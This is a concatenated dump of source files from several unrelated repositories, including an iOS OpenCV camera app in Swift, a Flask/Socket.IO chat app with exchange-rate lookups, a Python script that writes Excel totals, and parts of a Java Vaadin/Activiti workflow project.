var deviceInput: AVCaptureDeviceInput = AVCaptureDeviceInput.deviceInputWithDevice(cpdCaptureDevice, error: nil) as! AVCaptureDeviceInput
        // Get the video data output
var videoDataOutput:AVCaptureVideoDataOutput = AVCaptureVideoDataOutput()
        // Configure the pixel format (color channels).
let dctPixelFormatType : Dictionary<NSString, NSNumber> = [kCVPixelBufferPixelFormatTypeKey : kCVPixelFormatType_32BGRA]
videoDataOutput.videoSettings = dctPixelFormatType
        // Specify the queue on which frames are captured
//var videoDataOutputQueue: dispatch_queue_t = dispatch_queue_create("CtrlVideoQueue", DISPATCH_QUEUE_SERIAL)
videoDataOutput.setSampleBufferDelegate(self, queue: dispatch_get_main_queue())
videoDataOutput.alwaysDiscardsLateVideoFrames = true
        // Prepare the capture session
self.cpsSession = AVCaptureSession()
if(self.cpsSession.canAddInput(deviceInput))
{
self.cpsSession.addInput(deviceInput as AVCaptureDeviceInput)
}
else
{
NSLog("Failed adding Input")
}
if(self.cpsSession.canAddOutput(videoDataOutput))
{
self.cpsSession.addOutput(videoDataOutput)
}
else
{
NSLog("Failed adding Output")
}
self.cpsSession.sessionPreset = AVCaptureSessionPresetMedium
self.cpsSession.startRunning()
}
func captureOutput(captureOutput: AVCaptureOutput!, didOutputSampleBuffer sampleBuffer: CMSampleBuffer!, fromConnection connection: AVCaptureConnection!) {
        // Create a UIImage from the sample buffer and set it on the UIImageView.
imgCameraView.image = imcImageController.createImageFromBuffer(sampleBuffer)
}
/*func imageFromSampleBuffer(sampleBuffer: CMSampleBufferRef) -> UIImage
{
        // Get the pixel buffer.
var imageBuffer: CVImageBufferRef = CMSampleBufferGetImageBuffer(sampleBuffer);
        // Lock the base address of the pixel buffer
CVPixelBufferLockBaseAddress(imageBuffer, 0);
// Get information of the image
var baseAddress = CVPixelBufferGetBaseAddressOfPlane(imageBuffer, 0)
var bytesPerRow:size_t = CVPixelBufferGetBytesPerRow(imageBuffer);
var width:size_t = CVPixelBufferGetWidth(imageBuffer);
var height:size_t = CVPixelBufferGetHeight(imageBuffer);
        // RGB color space
var colorSpace:CGColorSpaceRef = CGColorSpaceCreateDeviceRGB();
var newContex:CGContextRef = CGBitmapContextCreate(baseAddress,
width,
height,
8,
bytesPerRow,
colorSpace,
CGBitmapInfo(CGImageAlphaInfo.PremultipliedFirst.toRaw()))
var imageRef:CGImageRef = CGBitmapContextCreateImage(newContex);
var ret:UIImage = UIImage(CGImage: imageRef);
//CGImageRelease(imageRef);
//CGContextRelease(newContext);
//CGColorSpaceRelease(colorSpace);
CVPixelBufferUnlockBaseAddress(imageBuffer, 0);
return ret;
}*/
}<file_sep># [iOS]ocvCameraImage
get edges from camera image by OpenCV
## License
Same as OpenCV http://opencv.willowgarage.com/wiki
## Version
* iOS8.4(iPhone5s)
* Xcode6.4
* OpenCV 3.0
## Required frameworks
* [opencv2.framework](http://opencv.org/downloads.html)
* CoreVideo.framework
* CoreMedia.framework
* AudioToolbox.framework
* AVFoundation.framework
<file_sep>//
// ViewController.swift
// ocvCameraImage
//
// Created by <NAME> on 2014/09/20.
// Copyright (c) 2014 masanori. All rights reserved.
//
import UIKit
class ViewController: UITableViewController
{
@IBOutlet weak var btnStart: UIButton!
var stbCameraView: UIStoryboard!
var cvcCameraView: CameraViewController!
override func viewDidLoad() {
super.viewDidLoad()
        // Prepare the destination storyboard
stbCameraView = UIStoryboard(name: "CameraView", bundle: nil)
cvcCameraView = stbCameraView!.instantiateViewControllerWithIdentifier("CameraViewCtrl") as! CameraViewController
}
override func didReceiveMemoryWarning() {
super.didReceiveMemoryWarning()
// Dispose of any resources that can be recreated.
}
@IBAction func btnStartTouched(sender: UIButton)
{
        // Present the camera storyboard
self.presentViewController(cvcCameraView, animated:false, completion: nil)
}
}
|
f5c2cbabc36948e335ea4a4dcde0dfd119db3ac1
|
[
"Swift",
"Markdown"
] | 3
|
Swift
|
vollcano/ocvCameraImage
|
d22bd6493760e3b122bbcec02272d806af9f81e3
|
f511f23750632c0097e8434805f5547964898f95
|
refs/heads/master
|
<repo_name>syntaxkim/project2-chatterbox<file_sep>/README_KOR.md
# Project 2 - Chatterbox (JavaScript)
English: [README.md](https://github.com/syntaxkim/project2-chatterbox/blob/master/README.md)
A single-page application (SPA) implemented in JavaScript. It provides an online messaging service with full-duplex communication over sockets (a minimal server-side sketch follows the screenshot below).
Demo: https://minsu-chatterbox.herokuapp.com/

## Features
### Remembering the user
The user's name is stored in the browser's local storage and the current channel in session storage.

### Channel creation
In addition to the default channel, users can create as many new channels as they want. Multiple channels are implemented with Python's dictionary (a hash table) and deque data structures; a minimal append sketch follows the structure diagram below.
Data structure
```
channels = {"general": deque([], maxlen=100)}
channels (dictionary)
|
v
"general" (deque)
|\____________________________
| |
v v
message1 (dictionary) message2
|\____________________ ____________________
| | |
v v v
"name" "message" "time"
```

### 실시간 환율 정보 (추가 기능)
KRW 기준으로 환율 정보를 제공합니다.

지원되는 통화 목록을 확인할 수 있습니다. (AJAX)

API: [exchangeratesapi](https://exchangeratesapi.io/)
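A minimal usage sketch of the helpers defined in `exchangerateapi.py` (included later in this repository); the printed values are only illustrative.
```
from exchangerateapi import get_currency_list, get_exchange_rate

# Currency codes supported by the API (e.g. ['CAD', 'HKD', ..., 'USD'])
print(get_currency_list())

# Latest exchange rate expressed as KRW per 1 USD
print(get_exchange_rate('USD'))
```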
## Languages and Tools
* Languages: Python 3.7, JavaScript ES6
* Frameworks and Libraries: Socket.IO, Flask, Bootstrap, jQuery
<file_sep>/exchangerateapi.py
import requests
# Free foreign exchange rates API.
url = "https://api.exchangeratesapi.io/latest"
base_currency = 'KRW'
def get_currency_list():
r = requests.get(url, params={'base': base_currency})
if r.status_code != 200:
raise Exception("ERROR: API request unsuccessful.")
currency_list = [k for k in r.json()['rates']]
return currency_list
def get_exchange_rate(base):
# Get exchange rate using external API.
r = requests.get(url, params={'base': base, 'symbol': 'KRW'})
    if r.status_code != 200:
raise Exception("ERROR: API request unsuccessful.")
exchange_rate = r.json()['rates']['KRW']
return exchange_rate<file_sep>/static/index.js
// When the DOM is done loaded,
document.addEventListener('DOMContentLoaded', () => {
// Get user name
if(!localStorage.getItem('name')) {
$('#modal').modal({ show:true, focus:true, keyboard:false, backdrop:'static' })
} else {
var name = localStorage.getItem('name')
document.querySelector('#username').innerHTML = name;
};
// Get channel name
if(!sessionStorage.getItem('channel')) {
sessionStorage.setItem('channel', 'general');
var channel = sessionStorage.getItem('channel');
} else {
var channel = sessionStorage.getItem('channel');
};
// Connect to websocket
const url = location.protocol + '//' + document.domain + ':' + location.port;
var socket = io.connect(url);
// When connected, configure buttons
socket.on('connect', () => {
// Disply the default channel
socket.emit('get messages', {'before': null, 'after': channel});
// Join in a user
document.querySelector('#join').onclick = join;
// Send a message
document.querySelector('#send').onsubmit = send;
// Create a channel
document.querySelector('#create').onclick = create;
// Load the channel
document.querySelectorAll('.channel').forEach(link => load(link));
// Leave the user
document.querySelector('#leave').onclick = leave;
});
function join() {
const name = document.querySelector('#name').value;
if (!name) {
document.querySelector('#user_message').innerHTML = "No user name";
return false;
} else {
// Save user name in client-side memory
socket.emit('join', {'name': name}, data => {
if (data === 1) {
document.querySelector('#user_message').innerHTML = "Username already taken";
return false;
} else {
localStorage.setItem('name', name);
location.reload();
};
});
};
};
function send() {
const message = document.querySelector('#message').value;
if (!message) {
return false;
} else {
const channel = sessionStorage.getItem('channel');
socket.emit('send', {'channel': channel, 'name': name, 'message': message});
document.querySelector('#message').value = "";
// Do not reload
return false;
};
};
function create() {
const channel = document.querySelector('#channel_name').value;
if (!channel) {
document.querySelector('#channel_message').innerHTML = "No channel name";
return false;
} else {
socket.emit('create', {'channel': channel}, data => {
if (data === 1) {
document.querySelector('#channel_message').innerHTML = "The same channel name already exists.";
return false;
} else if (data === 0) {
location.reload();
alert(`New channel: '${channel}' created.`);
};
});
};
};
function load(link) {
link.onclick = () => {
const before = sessionStorage.getItem('channel');
const after = link.dataset.channel;
socket.emit('get messages', {'before': before, 'after': after});
};
};
function leave() {
socket.emit('leave', {'name': name});
localStorage.clear();
sessionStorage.clear();
location.reload();
};
// Load messages
socket.on('load messages', data => loadMessages(data));
// Receive a new message
socket.on('new message', data => newMessage(data));
// Modal for currency list
var currency_modal = document.querySelector('#currency_modal');
// Get currency list
document.querySelector('#open_currency_list').onclick = getCurrencyList;
// Close currency modal
document.querySelector('#close_currency_list').onclick = () => {
currency_modal.style.display = "none";
};
window.onclick = function(event) {
if (event.target == currency_modal) {
currency_modal.style.display = "none";
};
};
});
function loadMessages(data) {
sessionStorage.setItem('channel', data.channel);
document.querySelector('#channelname').innerHTML = data.channel;
const messages = data.messages;
document.querySelector('#messages').innerHTML = "";
messages.forEach(data => newMessage(data));
};
function newMessage(data) {
if (!data.time) data.time="";
const card = document.createElement('div');
const att = document.createAttribute("class");
att.value = "card mb-1";
card.setAttributeNode(att);
const cardBody = document.createElement('div');
const att2 = document.createAttribute("class");
att2.value = "card-body py-3";
cardBody.setAttributeNode(att2);
card.append(cardBody);
cardBody.innerHTML = `<strong>${data.name}</strong> : ${data.message} ${data.time}`;
document.querySelector('#messages').append(card);
scrollToBottom();
};
function scrollToBottom() {
let messageList = document.querySelector('#message-list')
messageList.scrollTop = messageList.scrollHeight - messageList.clientHeight;
console.log(messageList.scrollTop);
};
function getCurrencyList() {
const request = new XMLHttpRequest();
request.open('GET', '/getCurrencyList');
request.responseType = 'json';
request.onload = () => {
document.querySelector('#currency_list').innerHTML = '';
const data = request.response;
var currency_list = data.currency_list;
currency_list.forEach(currency => {
document.querySelector('#currency_list').append(`${currency}, `);
});
currency_modal.style.display = "block";
};
request.send();
return false;
}<file_sep>/requirements.txt
Flask==1.0.2
flask-socketio==3.1.0
gevent==1.3.7
gevent-websocket==0.10.1
gunicorn==19.9.0
requests==2.20.1<file_sep>/README.md
# Project 2 - Chatterbox (JavaScript)
Korean: [README_KOR.md](https://github.com/syntaxkim/project2-chatterbox/blob/master/README_KOR.md)
A single-page application (SPA) that provides a full-duplex online messaging service, built with JavaScript and Socket.IO.
Demo app: https://minsu-chatterbox.herokuapp.com/

## Features
### Save user information
Username and channel name are saved in local storage and session storage, respectively.

### Create your own channel
You can create as many channels as you want. Multiple channels are implemented using Python's dictionary (hash table) and deque (double-ended queue) data structures; a minimal sketch follows the diagram below.
Data structures
```
channels = {"general": deque([], maxlen=100)}
channels (dictionary)
|
v
"general" (deque)
|\____________________________
| |
v v
message1 (dictionary) message2
|\____________________ ____________________
| | |
v v v
"name" "message" "time"
```
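A minimal sketch (illustrative only; the user name and message text below are made up) of how the bounded deque behaves once a channel holds 100 messages:
```python
from collections import deque

# Each channel maps to a bounded message buffer, as in application.py.
channels = {"general": deque([], maxlen=100)}

# Appending beyond maxlen silently drops the oldest message.
for i in range(105):
    channels["general"].append({"name": "alice", "message": f"msg {i}", "time": "12:00 PM"})

print(len(channels["general"]))           # 100
print(channels["general"][0]["message"])  # "msg 5" -- the first five were discarded
```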

### Get foreign exchange rates in real-time (additional feature)
The base currency is set to KRW.

You can also look up a list of available exchange rates. (AJAX)

API: [exchangeratesapi](https://exchangeratesapi.io/)
## Languages and Tools
* Languages: Python 3.7, JavaScript ES6
* Frameworks and Libraries: Socket.IO, Flask, Bootstrap, jQuery
<file_sep>/application.py
# Built-in libraries
import os
from collections import deque
from datetime import datetime, timedelta
# External libraries
from flask import Flask, render_template, jsonify
from flask_socketio import SocketIO, emit, join_room, leave_room
# Custom library
from exchangerateapi import get_currency_list, get_exchange_rate
app = Flask(__name__)
app.config["SECRET_KEY"] = os.urandom(24)
socketio = SocketIO(app)
# Server-side memory
users = set()
channels = {"general": deque([], maxlen=100)}
currency_list = get_currency_list()
# for development
channels["general"].append({"name": "general", "message": "Welcome to Chatterbox"})
channels["channel 1"] = deque([], maxlen=100)
channels["channel 1"].append({"name": "channel 1", "message": "This is channel 1"})
channels["channel 2"] = deque([], maxlen=100)
channels["channel 2"].append({"name": "channel 2", "message": "This is channel 2"})
@app.route("/")
def index():
return render_template("index.html", channels=list(channels), users=list(users))
# Join in a user
@socketio.on("join")
def join(json):
name = json["name"]
if name in users:
return 1
else:
users.add(name)
# Send a message
@socketio.on("send")
def send(json):
# If user asks for exchange rate,
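# A message like "USD" or "100 USD" (an optional integer quantity followed by a
# currency code from currency_list) is answered with its KRW equivalent.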
text = json["message"].upper().split()
if 0 < len(text) <= 2 and text[-1] in currency_list:
if len(text) == 1:
quantity = 1
base = text[0]
elif len(text) == 2:
quantity = int(text[0])
base = text[1]
try:
exchange_rate = get_exchange_rate(base)
json["message"] = f"{quantity} {base} is equal to {exchange_rate * quantity:.2f} KRW"
except:
json["message"] = "ERROR: API request unsuccessful."
time = get_time()
message = {"name": json['name'], "message": json["message"], "time": time}
channels[json["channel"]].append(message)
emit("new message", message, room=json["channel"])
# Create a channel
@socketio.on("create")
def create(json):
channel = json["channel"]
if channel in channels:
return 1
else:
time = get_time()
channels[channel] = deque([], maxlen=100)
channels[channel].append({"name": channel, "message": "New channel created", "time": time})
return 0
# emit("new channel", {"channel": channel}, broadcast=True)
# Load messages
@socketio.on("get messages")
def get_messages(json):
before = json["before"]
leave_room(before)
channel = json["after"]
join_room(channel)
emit("load messages", {"channel": channel, "messages": list(channels[channel])})
# leave the user
@socketio.on("leave")
def leave(json):
name = json["name"]
if name in users:
users.remove(name)
@socketio.on_error()
def error_handler(e):
print(f"An error has occured: {str(e)}")
@app.route("/getCurrencyList", methods=["GET"])
def getCurrencyList():
currency_list = get_currency_list()
return jsonify({"currency_list": currency_list})
def get_time():
return (datetime.now() + timedelta(hours=9)).strftime("%I:%M %p")
if __name__ == "__main__":
socketio.run(app, host="0.0.0.0")
|
c91c7c7e455d4249df2b49c0f36243772de3df63
|
[
"Markdown",
"Python",
"JavaScript",
"Text"
] | 6
|
Markdown
|
syntaxkim/project2-chatterbox
|
d1e8b6320620b6f5a3cf7a97936fced9d2cb3c83
|
96356bace3f89084a4d773235179ec50b9d42213
|
refs/heads/main
|
<file_sep>import openpyxl
import shutil
import os
def get_ppe_linecount(FILENAME):
#Gets the total lines so that the get_ppe_actual function can determine where the total is
line_count = 0
char_count = 0
with open(FILENAME) as file:
for line in file:
line = line.strip("\n")
line_count += 1
char_count += len(line)
return line_count
def get_ppe_actual(FILENAME):
#Determines where the total is by splitting the string of the last line of the Actuals file
#from the end of the date on the total line, which happens to be the 135th character on the last line
#then formats the string, floats it, turns it into a real number, and returns to display on console and
#write to the excel sheet
line_count = get_ppe_linecount(FILENAME)
with open(FILENAME) as file:
file_contents = file.readlines()
file_total_raw = file_contents[line_count - 1]
total_actual_str = file_total_raw[135:]
#total_actual_str = total_actual_str.replace("0", "")
#the above can't be used accurately if the actual values contain zeros
total_actual_str = total_actual_str.strip()
total_actual = float(total_actual_str)
total_actual = total_actual * 0.00000000001
total_actual = round(total_actual, 2)
return total_actual
def write_actual(total_actual):
#opens the excel sheet that is created by the post PPE queries
#relies on the path that AQT saves query results to, as well as the filename generated by the query
#writes the total value taken from the UFLACTUALS file saved in the same directory
from openpyxl.styles import Font
wb = openpyxl.load_workbook(filename='Deferred_Comp_2020-08-06.xlsx', read_only=False)
sheet = wb['DEF COMP']  # subscript access replaces the deprecated get_sheet_by_name()
fontObject = Font(name='MS Sans Serif', size=8)
sheet['A7'].value = 'TXT File Total'
sheet['A7'].font = fontObject
sheet['B7'].value = total_actual
sheet['B7'].font = fontObject
wb.save('Deferred_Comp_$PPE_Modified.xlsx')
def main():
os.chdir(r'H:\SavedQueries')  # raw string so the backslash is not treated as an escape
# specify file name
FILENAME = "ACTUAL.txt"
line_count = get_ppe_linecount(FILENAME)
total_actual = get_ppe_actual(FILENAME)
write_actual(total_actual)
print("Welcome!")
print()
print("lines: ", line_count)
print("Total: ", total_actual)
if __name__ == "__main__":
main()
|
dc5829889e13b782048ab4b9f5748327129d2c8c
|
[
"Python"
] | 1
|
Python
|
the-berryman/actual-edit
|
cc58dce3ed025e59b80ac692818c5f6b6cf9226b
|
f6e907b5ce61b08b292ab27bb8326cb38abcca60
|
refs/heads/master
|
<repo_name>kitsunet/Kitsunet.ProxyObjects<file_sep>/Classes/Exception.php
<?php
namespace Kitsunet\ProxyObjects;
class Exception extends \Exception {
}<file_sep>/Classes/PathNotFoundException.php
<?php
namespace Kitsunet\ProxyObjects;
/**
* Class PathNotFoundException
*
* @package Kitsunet\ProxyObjects
*/
class PathNotFoundException extends Exception {
}<file_sep>/README.md
Kitsunet.ProxyObjects
=====================
<file_sep>/Classes/MaybeObject.php
<?php
namespace Kitsunet\ProxyObjects;
/**
* A proxy object to help object method chaining without having to test for NULL all the way.
* This takes inspiration from the Maybe monad.
*
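* Usage sketch (the object and method names below are purely illustrative):
*
*   $maybe = new MaybeObject($order);            // $order is some domain object
*   $name  = $maybe->getCustomer()->getName();   // object results are re-wrapped, scalars are returned as-is
*   $plain = $maybe->getCustomer()();            // __invoke() unwraps the proxied object again
*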
*/
class MaybeObject {
/**
* @var object The object or NULL
*/
protected $object;
/**
* @var \Closure
*/
protected $nullCallback;
/**
* @param object $object The object or NULL
* @param callable $nullCallback
*/
public function __construct($object = NULL, \Closure $nullCallback = NULL) {
$this->object = $object;
$this->nullCallback = $nullCallback;
}
/**
* @param string $method
* @param array $arguments
* @return mixed
*/
public function __call($method, $arguments) {
if ($this->object === NULL) {
if ($this->nullCallback !== NULL) {
return $this->nullCallback->__invoke($method, $arguments);
} else {
return NULL;
}
}
$result = call_user_func_array(array($this->object, $method), $arguments);
if (is_object($result)) {
return new MaybeObject($result, $this->nullCallback);
} else {
return $result;
}
}
/**
*
* @param callable $nullHandler
* @return mixed
*/
public function __invoke(\Closure $nullHandler = NULL) {
if ($nullHandler !== NULL && $this->object === NULL) {
return $nullHandler->__invoke();
}
return $this->object;
}
/**
* @return boolean
*/
public function __isNull() {
return ($this->object === NULL);
}
/**
* Set a callback function to be executed when a method is called on the proxied object while it is in fact NULL.
* The callback receives two arguments:
* - string $name The name of the called method.
* - array $arguments The arguments given to the method.
*
* @param callable $callback
*/
public function __setNullCallback(\Closure $callback) {
$this->nullCallback = $callback;
}
}
|
39d391f0034c886571510a9e5bb7d97cc388de6c
|
[
"Markdown",
"PHP"
] | 4
|
PHP
|
kitsunet/Kitsunet.ProxyObjects
|
4cec4229b3b918435ca894f265591ae1facdbf36
|
c92ec2321d15c5f6f72b133b287dcf1c0b5b4a98
|
refs/heads/master
|
<repo_name>klwork/klwork-social<file_sep>/src/main/resources/db.properties
db=mydb
jdbc.driver=org.postgresql.Driver
jdbc.url=jdbc:postgresql://localhost:5432/mydb
jdbc.username=test
jdbc.password=<PASSWORD>
<file_sep>/src/test/java/com/klwork/test/base/BaseTxWebTests.java
package com.klwork.test.base;
import org.apache.ibatis.session.SqlSessionFactory;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.test.context.ContextConfiguration;
import org.springframework.test.context.junit4.AbstractTransactionalJUnit4SpringContextTests;
@ContextConfiguration(locations = { "classpath:/spring-config/applicationContext.xml" })
public abstract class BaseTxWebTests extends AbstractTransactionalJUnit4SpringContextTests {
protected Logger logger = LoggerFactory.getLogger(getClass());
public BaseTxWebTests() {
}
/**
* Flush the session
*/
private void flushSession() {
SqlSessionFactory sessionFactory = (SqlSessionFactory) applicationContext
.getBean("sqlSessionFactory");
sessionFactory.openSession().commit();
}
protected static boolean isTest = false;
/**
* Calling this method writes the test data to the database
*/
public void flushToDataBase() {
if (!isTest) {
flushSession();
//setComplete();
}
}
}<file_sep>/src/main/java/com/klwork/business/domain/model/TeamMembershipQuery.java
package com.klwork.business.domain.model;
import com.klwork.common.dao.QueryParameter;
/**
*
* @version 1.0
* @created ${plugin.now}
* @author ww
*
*/
public class TeamMembershipQuery extends QueryParameter{
}
<file_sep>/src/main/java/com/klwork/explorer/ui/handler/CommonFieldHandler.java
package com.klwork.explorer.ui.handler;
import java.util.Map;
import com.klwork.common.utils.StringTool;
import com.klwork.explorer.ui.mainlayout.ExplorerLayout;
import com.vaadin.data.Item;
import com.vaadin.server.Sizeable.Unit;
import com.vaadin.shared.ui.datefield.Resolution;
import com.vaadin.ui.CheckBox;
import com.vaadin.ui.ComboBox;
import com.vaadin.ui.Component;
import com.vaadin.ui.DateField;
import com.vaadin.ui.Label;
import com.vaadin.ui.TextArea;
import com.vaadin.ui.TextField;
public class CommonFieldHandler {
public static TextField createTextField(String caption) {
TextField f = new TextField();
if (StringTool.judgeBlank(caption)) {
f.setCaption(caption);
}
// TextField f = new TextField(caption);
f.setNullRepresentation("");
return f;
}
public static CheckBox createCheckBox(String caption) {
CheckBox cb = new CheckBox(caption);
cb.setImmediate(true);
return cb;
}
public static TextArea createTextArea(String caption) {
TextArea f = new TextArea();
if (StringTool.judgeBlank(caption)) {
f.setCaption(caption);
}
f.setNullRepresentation("");
return f;
}
public static DateField createDateField(String caption,
boolean useSecondResolution) {
DateField f = new DateField();
if (StringTool.judgeBlank(caption)) {
f.setCaption(caption);
}
f.setDateFormat("yyyy-MM-dd HH:mm");
f.setShowISOWeekNumbers(true);
if (useSecondResolution) {
f.setResolution(Resolution.SECOND);
} else {
f.setResolution(Resolution.MINUTE);
}
return f;
}
public static ComboBox createComBox(String caption,
Map<String, String> data, Object defaultValue) {
ComboBox s = new ComboBox();
s.setNullSelectionAllowed(false);
Object firstItemId = null;
if (StringTool.judgeBlank(caption)) {
s.setCaption(caption);
}
for (String p : data.keySet()) {
String title = data.get(p);
Item i = s.addItem(p);
s.setItemCaption(p, title);
if(p.equals(defaultValue)){
firstItemId = p;
}
}
// Select first element
if (firstItemId != null) {
s.select(firstItemId);
}
return s;
}
/**
* Returns a horizontal separator line
* @return
*/
public static Component getSpacer() {
// Add a separator line
Label spacer = new Label();
spacer.setWidth(100, Unit.PERCENTAGE);
spacer.addStyleName(ExplorerLayout.STYLE_DETAIL_BLOCK);
return spacer;
}
}
<file_sep>/others/build.xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE project [<!ENTITY common SYSTEM "common.xml">]>
<project name="ResolveJarsByMaven" basedir="." default="" xmlns:artifact="urn:maven-artifact-ant">
<property name="mvnsettings" value="mvnSettings.xml" />
<property environment="env" />
<property name="project.home" value="${basedir}/.." />
<property name="WebRoot" value="${project.home}/WebRoot" />
<property name="WEB-INF/lib" value="${WebRoot}/WEB-INF/lib" />
<property name="classes" value="${WebRoot}/WEB-INF/classes" />
<property name="jar-sources" value="${basedir}/jar-sources" />
<property name="jar-others" value="${basedir}/jar-others" />
<property name="spec-lib" value="${basedir}/spec-lib" />
<property name="third-lib" value="${basedir}/third-lib" />
<typedef resource="org/apache/maven/artifact/ant/antlib.xml" uri="urn:maven-artifact-ant">
<classpath>
<pathelement location="${basedir}/spec-lib/maven-ant-tasks-2.1.3.jar" />
</classpath>
</typedef>
<artifact:pom file="../pom.xml" id="maven.project" />
<target name="copyRuntimeJars" description="将所有运行时所需的Jar包都放到WEB-INF的lib下">
<artifact:dependencies pathId="runtime.classpath" filesetId="runtime.fileset" useScope="runtime" settingsfile="${mvnsettings}">
<pom refid="maven.project" />
</artifact:dependencies>
<delete>
<fileset dir="${WEB-INF/lib}" includes="*.jar" />
</delete>
<copy todir="${WEB-INF/lib}">
<fileset refid="runtime.fileset" />
<mapper type="flatten" />
</copy>
<!-- Special jars that were downloaded manually are placed in this directory -->
<copy todir="${WEB-INF/lib}" preservelastmodified="true">
<fileset dir="${third-lib}" />
<mapper type="flatten" />
</copy>
</target>
<target name="copyOtherJars" description="将除运行时所需的Jar包外都放到otherlibs下">
<artifact:dependencies pathId="full.classpath" filesetId="full.fileset" sourcesfilesetid="full.sources.fileset" useScope="test" settingsfile="${mvnsettings}">
<pom refid="maven.project" />
</artifact:dependencies>
<copy todir="${jar-sources}">
<fileset refid="full.sources.fileset" />
<mapper type="flatten" />
</copy>
<!--<copy todir="${jar-others}">
<referenceFileset refid="full.fileset" excludeDir="${WEB-INF/lib}" />
<mapper type="flatten" />
</copy>-->
</target>
<path id="testTask.classpath">
<fileset dir="${WEB-INF/lib}">
<include name="**/*.jar" />
</fileset>
</path>
<target name="SassCompile" description="SassCompile">
<property name="param1" value="${WebRoot}/VAADIN/themes/social/styles.scss" />
<property name="param2" value="${WebRoot}/VAADIN/themes/social/styles.css" />
<java classname="com.vaadin.sass.SassCompiler">
<arg value="${param1}" />
<arg value="${param2}" />
<classpath>
<path refid="testTask.classpath" />
</classpath>
</java>
</target>
</project>
<file_sep>/src/main/java/com/klwork/flow/act/ActTaskAssignmentListener.java
/* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.klwork.flow.act;
import org.activiti.engine.delegate.DelegateTask;
import org.activiti.engine.delegate.TaskListener;
import com.klwork.business.domain.model.EntityDictionary;
import com.klwork.business.domain.model.OutsourcingProject;
import com.klwork.business.domain.service.OutsourcingProjectService;
import com.klwork.business.domain.service.ProjectManagerService;
import com.klwork.explorer.ViewToolManager;
import com.klwork.flow.task.ExecutionHandler;
/**
* @author <NAME>
*/
public class ActTaskAssignmentListener implements TaskListener {
private static final long serialVersionUID = 1L;
private static OutsourcingProjectService outsourcingProjectService = ViewToolManager
.getBean("outsourcingProjectService");
private static ProjectManagerService projectManagerService = ViewToolManager
.getBean("projectManagerService");
public void notify(DelegateTask delegateTask) {
delegateTask.setDescription("TaskAssignmentListener is listening: "
+ delegateTask.getAssignee());
String userId = ExecutionHandler.getVar(delegateTask,EntityDictionary.CLAIM_USER_ID);
String outsourcingProjectId = ExecutionHandler.getVar(delegateTask,EntityDictionary.OUTSOURCING_PROJECT_ID);
if (userId != null) {
System.out.println("外部claimUserId:" + userId);
delegateTask.setAssignee((String) userId);
} else {
OutsourcingProject p = outsourcingProjectService.findOutsourcingProjectById(outsourcingProjectId);
if(p != null){
System.out.println("项目参与人:" + p.getOwnUser());
delegateTask.setAssignee(p.getOwnUser());
userId = p.getOwnUser();
}
}
projectManagerService.addNewParticipate(outsourcingProjectId, userId);
saveAuthToVariable(delegateTask, userId.toString());
}
private void saveAuthToVariable(DelegateTask delegateTask,
String authenticatedUserId) {
delegateTask.setVariableLocal(EntityDictionary.CLAIM_USER_ID,
authenticatedUserId);
delegateTask.getExecution().setVariableLocal(EntityDictionary.CLAIM_USER_ID,
authenticatedUserId);
}
}
<file_sep>/src/main/java/com/klwork/flow/act/CurrentReviewService.java
package com.klwork.flow.act;
import java.util.ArrayList;
import java.util.Date;
import java.util.List;
import org.activiti.engine.delegate.DelegateExecution;
import org.activiti.engine.delegate.JavaDelegate;
import com.klwork.business.domain.model.EntityDictionary;
import com.klwork.business.domain.service.ProjectParticipantService;
import com.klwork.explorer.ViewToolManager;
public class CurrentReviewService implements JavaDelegate {
private static ProjectParticipantService projectParticipantService = ViewToolManager
.getBean("projectParticipantService");
@Override
public void execute(DelegateExecution execution) {
//String participants = (String) execution.getVariable("participants");
String outsourcingProjectId = (String) execution.getVariable(EntityDictionary.OUTSOURCING_PROJECT_ID);
String upLoadtaskId = (String) execution.getVariable(EntityDictionary.UP_LOADTASK_ID);
System.out.println("上一个任务:" + upLoadtaskId);
String participants = "ww_management,ww";
// Find the reviewers of the task to carry out the review
String[] participantsArray = participants.split(",");
List<String> assigneeList = new ArrayList<String>();
for (String assignee : participantsArray) {
assigneeList.add(assignee);
}
//execution.setVariable("reviewersList", assigneeList);
execution.setVariable("reviewer", "ww_management");
// Keep a local copy
execution.setVariableLocal(EntityDictionary.UP_LOADTASK_ID, upLoadtaskId);
// Create the reviewer participant in advance
projectParticipantService.addProjectParticipantByParam(outsourcingProjectId, "ww_management", EntityDictionary.PARTICIPANTS_TYPE_SCORER,upLoadtaskId);
// Add the reviewer
}
}
<file_sep>/src/main/java/com/klwork/ui/security/MyJdbcShiroRealm.java
package com.klwork.ui.security;
import java.util.ArrayList;
import java.util.List;
import org.activiti.engine.IdentityService;
import org.activiti.engine.identity.Group;
import org.activiti.engine.identity.User;
import org.apache.shiro.SecurityUtils;
import org.apache.shiro.authc.AuthenticationException;
import org.apache.shiro.authc.AuthenticationInfo;
import org.apache.shiro.authc.AuthenticationToken;
import org.apache.shiro.authc.SimpleAuthenticationInfo;
import org.apache.shiro.authc.UsernamePasswordToken;
import org.apache.shiro.authz.AuthorizationInfo;
import org.apache.shiro.authz.SimpleAuthorizationInfo;
import org.apache.shiro.realm.AuthorizingRealm;
import org.apache.shiro.session.Session;
import org.apache.shiro.subject.PrincipalCollection;
import org.apache.shiro.subject.Subject;
import com.klwork.explorer.Constants;
/**
* Shiro Realm implementation
*
* @author ww
*
*/
public class MyJdbcShiroRealm extends AuthorizingRealm {
private IdentityService identityService;
public IdentityService getIdentityService() {
return identityService;
}
public void setIdentityService(IdentityService identityService) {
this.identityService = identityService;
}
/**
* Authorization information
*/
protected AuthorizationInfo doGetAuthorizationInfo(
PrincipalCollection principals) {
String username = (String) principals.fromRealm(getName()).iterator()
.next();
if (username != null) {
User la = identityService.createUserQuery().userId(username)
.singleResult();
if (la != null && currentRoles() != null) {
SimpleAuthorizationInfo info = new SimpleAuthorizationInfo();
/*
* for (Role each : currentRoles) { if (each.getName() != null)
* info.addRole(each.getName()); Collection<String> pers =
* each.getPermissionsAsString(); if (pers != null)
* info.addStringPermissions(pers); }
*/
info.addRole("user");
info.addStringPermission("main");
return info;
}
}
return null;
}
private List currentRoles() {
List test = new ArrayList();
return test;
}
/**
* Authentication information
*/
